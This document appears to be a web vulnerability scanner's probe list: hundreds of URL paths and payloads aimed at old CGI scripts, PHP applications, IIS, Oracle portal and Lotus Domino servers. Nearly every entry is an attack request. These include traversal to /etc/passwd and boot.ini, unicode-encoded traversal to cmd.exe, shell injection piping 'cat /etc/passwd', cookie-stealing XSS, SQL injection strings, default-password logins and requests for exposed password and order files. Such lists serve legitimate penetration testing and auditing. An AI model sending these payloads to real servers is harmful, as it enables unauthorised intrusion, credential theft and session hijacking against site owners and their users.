nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
nsn/env.bas
nsn/fdir.bas
nsn/fdir.bas:ShowVolume
ntitar.pl
ntsync4.nsf
ntsync45.nsf
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
odbc/
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
officescan/hotdownload/ofscan.ini
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
old/
open?
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
oprocmgr-status
options.inc.php+
options.php?optpage=<script>alert('Vulnerable!')</script>
oracle
oradata/
order/
order/order_log.dat
order/order_log_v12.dat
orders/
orders/checks.txt
orders/mountain.cfg
orders/order_log.dat
orders/order_log_v12.dat
orders/orders.log
orders/orders.txt
oscommerce/default.php
outgoing/
owa_util%2esignature
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
ows-bin/perlidlc.bat?&dir
ows/
ows/restricted%2eshow
pafiledb/includes/team/file.php
page.cgi?../../../../../../../../../../etc/passwd
pagelog.cgi
pages/
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
parse-file
parse_xml.cgi
pass
pass_done.php
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password.inc
password/
passwords.txt
passwords/
path/nw/article.php?id='
pbcgi.cgi?name=Joe%Camel&email=%3C
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll
pccsmysqladm/incs/dbconnect.inc
pdf/
people.list
perl
perl-status
perl.exe
perl.exe?-v
perl/
perl/-e%20%22system('cat%20/etc/passwd');\%22
perl/-e%20print%20Hello
perl/env.pl
perl/files.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
perl5/
perl5/files.pl
perl?-v
perlshop.cgi
perweb.nsf
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdispaly.cgi?../../../../../../../../../../etc
pfdispaly.cgi?../../../../../../../../../../etc/passwd
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
phf
phf.cgi?QALIA
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/stats.php
photo/
photo/manage.cgi
photo/protected/manage.cgi
photo_album/apa_phpinclude.inc.php
photodata/
photodata/manage.cgi
php-cgi
php-coolfile/action.php?action=edit&file=config.php
php.cgi?/etc/passwd
php.ini
php/
php/gaestebuch/admin/index.php
php/index.php
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\boot.ini
php/php.exe?c:\winnt\boot.ini
php/php4ts.dll
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB2/includes/db.php
phpBB2/search.php?search_id=1\
phpEventCalendar/file_upload.php
phpMyAdmin/
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
phpmyadmin/
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phprocketaddin/?page=../../../../../../../../../../boot.ini
phprocketaddin/?page=../../../../../../../../../../etc/passwd
phpshare/phpshare.php
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
pics/
piranha/secure/passwd.php3
pix/
pks/lookup
pls/admin
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
pls/ldc/admin_/
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/HTP.PRINT
pls/portal/PORTAL.home
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/SELECT
pls/portal/null
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.signature
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plusmail
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/lib.inc.php
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pmlite.php
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
poll
pollit/Poll_It_
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
polls
pollssi.cgi
poppassd.php3+
porn/
post-query
post16.exe
post32.exe|dir%20c:\\
post_query
postcards.cgi
postinfo.html
postnuke/html/index.php?module=My_eGallery
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
postnuke/index.php?module=My_eGallery
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
powerup/r.cgi?FILE=../../../../../../../../../../passwd
pp.php?action=login
ppdscgi.exe
pr0n/
prd.i/pgen/
printenv
printenv.tmp
privado/
private.nsf
private/
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
prod/
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
product_info.php
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
profile.cgi
profile.php?u=JUNK(8)
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
project/index.php?m=projects&user_cookie=1
prometheus-all/index.php
pron/
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protection.php
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
prueba/
pruebas/
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pt_config.inc
ptg_upgrade_pkg.log
pu3.pl
pub/
pub/english.cgi?op=rmail
public.nsf
public/
publica/
publicar/
publico/
publisher/
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
purchase/
purchases/
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/ch_info.php?newpass=password&confirm=password%20
pvote/del.php?pollorder=1%20
pw/
pw/storemgr.pw
pwd.db
python/
qpadmin.nsf
query
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query?mss=%2e%2e/config
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
quickstore.cgi?page=../../../../../../../../../../etc
quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
quikmail/nph-emumail.cgi?type=../%00
quikstore.cfg
quikstore.cgi
quizme.cgi
r.cgi?FILE=../../../../../../../../../../etc
r.cgi?FILE=../../../../../../../../../../etc/passwd
ratlog.cgi
reademail.pl
readme
readme.eml
readme.nsf
readme.txt
readmec.nsf
readmes.nsf
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect
register.cgi
register/
registered/
replicator/webpage.cgi/
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
reports.nsf
reports/
reports/rwservlet
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/showenv
reports/rwservlet/showjobs
reports/rwservlet/showmap
reports/rwservlet/showmap?server=myserver
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
reports/temp/
reseller/
responder.cgi
restricted/
retail/
retrieve_password.pl
reviews/newpro.cgi
rguest.exe
rightfax/fuwww.dll/?
rksh
rmp_query
robadmin.cgi
robpoll.cgi
room/save_item.php
root
root/
rpc.php?q="><script>alert(document.cookie)</script>
rpc.php?q='&t='
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpm_query
rsh
rtm.log
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sales/
sam
sam._
sam.bin
sample/
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
samples/
samples/search.dll?query=<script>alert(document.cookie)</script>
samples/search/queryhit.htm
save/
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sbcgi/sitebuilder.cgi
sca/menu.jsp
schema50.nsf
scoadminreg.cgi
scozbook/view.php?PG=whatever
scr/
scratch
screen.php
script>alert('Vulnerable')</script>.cfm
scripts
scripts/*%0a.pl
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
scripts/CGImail.exe
scripts/Carello/Carello.dll
scripts/admin.pl
scripts/cfgwiz.exe
scripts/contents.htm
scripts/convert.bas
scripts/counter.exe
scripts/cphost.dll
scripts/cpshost.dll
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
scripts/httpodbc.dll
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/no-such-file.pl
scripts/postinfo.asp
scripts/proxy/w3proxy.dll
scripts/repost.asp
scripts/root.exe?/c+dir+c:\+/OG
scripts/samples/ctguestb.idc
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/samples/search/webhits.exe
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
scripts/tools/ctss.idc
scripts/tools/dsnform
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
scripts/weblog
scripts/wsisa.dll/WService=anything?WSMadmin
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search.asp?Search=
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
search.asp?term=<%00script>alert('Vulnerable')</script>
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
search.php?zoom_query=<script>alert(\"hello\")</script>
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search.pl?form=../../../../../../../../../../etc
search.pl?form=../../../../../../../../../../etc/passwd%00
search.vts
search/
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
search/sqlqhit.asp
search97.vts
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
secret.nsf
secret/
secure/
securecontrolpanel/
secured/
securelogin/1,2345,A,00.html
security/web_access.html
sell/
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendphoto.php
sendtemp.pl?templ=../../../../../../../../../../etc
sendtemp.pl?templ=../../../../../../../../../../etc/passwd
sensepost.exe?/c+dir
server-info
server-status
server/
server_stats/
servers/link.cgi
service/
services/
servicio/
servicios/
servlet/AdminServlet
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/PrintServlet
servlet/SchedulerTransfer
servlet/SearchServlet
servlet/ServletManager
servlet/SessionManager
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
servlet/allaire.jrun.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.unify.servletexec.UploadServlet
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/gwmonitor
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlet/sq1cdsn
servlet/sqlcdsn
servlet/sunexamples.BBoardServlet
servlet/webacc
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
servlet/webacc?User.html=noexist
servlet/webpub
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
servlets/SchedulerTransfer
servlets/weboam/oam/oamLogin
session/adminlogin
session/admnlogin
setpasswd.cgi
settings/site.ini
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
setup.nsf
setup/
setupweb.nsf
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
sh
shop.cgi?page=../../../../../../../etc/passwd
shop.pl/page=;cat%20shop.pl|
shop/
shop/auth_data/auth_user_file.txt
shop/database/metacart.mdb
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/orders/orders.txt
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shopa_sessionlist.asp
shopadmin.asp
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
shopdbtest.asp
shopexd.asp?catalogid='42
shoponline/fpdb/shop.mdb
shopper.cgi?newpage=../../../../../../../../../../etc
shopper.cgi?newpage=../../../../../../../../../../etc/passwd
shopper/
shopping/database/metacart.mdb
shopping/diag_dbtest.asp
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?conf=../../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
show.pl
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
showcheckins.cgi?person=<script>alert('Vulnerable')</script>
showcheckins.cgi?person=<script>alert('XSS')</script>
showmail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
showuser.cgi
shtml.dll
signon
simple/view_page?mv_arg=|cat%20/etc/passwd|
simplebbs/users/users.php
simplestguest.cgi
simplestmail.cgi
sips/sipssys/users/a/admin/user
site/'
site/eg/source.asp
site/iissamples/
site_searcher.cgi
sitemap.xml
siteminder
siteminder/smadmin.html
siteseed/
siteserver/publishing/viewcode.asp?source=/default.asp
smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smbcfg.nsf
smconf.nsf
smency.nsf
smg_Smxcfg30.exe?vcc=3560121183d3
smhelp.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smssend.php
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
soap/servlet/soaprouter
soapConfig.xml
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
software.nsf
software/
soinfo.php?\"><script>alert('Vulnerable')</script>
sojourn.cgi?cat=../../../../../../../../../../etc
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
solaris/
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
source/
spelling.php3+
spin_client.cgi?aaaaaaaa
spwd
sql/
sqldump.sql
sqlnet.log
sqlqhit.asp
squirrelmail/src/read_body.php
src/
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
srchadm
srvinst.nsf
srvnam.htm
srvstatus.chl+
ss
ss.cfg
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
sscd_suncourier.pl
ssdefs/siteseed.dtd
ssi/
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
staff/
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
start.php?config=alper.inc.php
stat.htm
stat.pl
stat/
staticpages/index.php
statistic/
statistics/
statmail.nsf
statrep.nsf
stats-bin-p/reports/index.html
stats.htm
stats.html
stats.pl
stats.prf
stats.txt
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
status.php3
status/
status?full=true
statusconfig.pl
statview.pl
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
store.cgi?
store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
store/
store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../../etc/passwd
story.pl?next=../../../../../../../../../../etc
story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../passwd%00
streg.nsf
stronghold-info
stronghold-status
structure.sql
stsrc.nsf
style/
styles/
stylesheet/
stylesheets/
subir/
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
submit?setoption=q&option=allowed_ips&value=255.255.255.255
sun/
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
super_stats/access_logs
super_stats/error_logs
support/
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
support/messages
supporter/index.php
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/tupdate.php
surf/scwebusers
survey
survey.cgi
sw000.asp?|-|0|404_Object_Not_Found
swf
sws/admin.html
sws/manager.pl
sys/
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syslog.htm?%20
system/
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?template=../
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
tablebuild.pl
talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
tar/
tarjetas/
tcb/files/auth/r/root
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
technote/print.cgi
temp/
template/
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
temporal/
test
test-cgi.bat
test-cgi.exe?<script>alert(document.cookie)</script>
test-cgi.tcl
test-cgi?/*
test-env
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test.cgi
test.htm
test.html
test.nsf
test.php
test.php%20
